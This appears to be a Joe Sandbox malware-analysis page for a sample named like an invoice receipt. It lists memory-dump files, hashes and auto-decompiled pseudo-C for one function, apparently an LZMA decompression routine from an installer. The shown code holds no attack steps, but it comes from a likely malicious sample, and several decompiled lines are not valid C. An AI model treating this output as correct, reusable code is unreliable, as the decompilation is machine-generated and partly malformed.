0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004066bb
0x004066b8
0x00000000
0x004062ef

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406409, Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406409() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
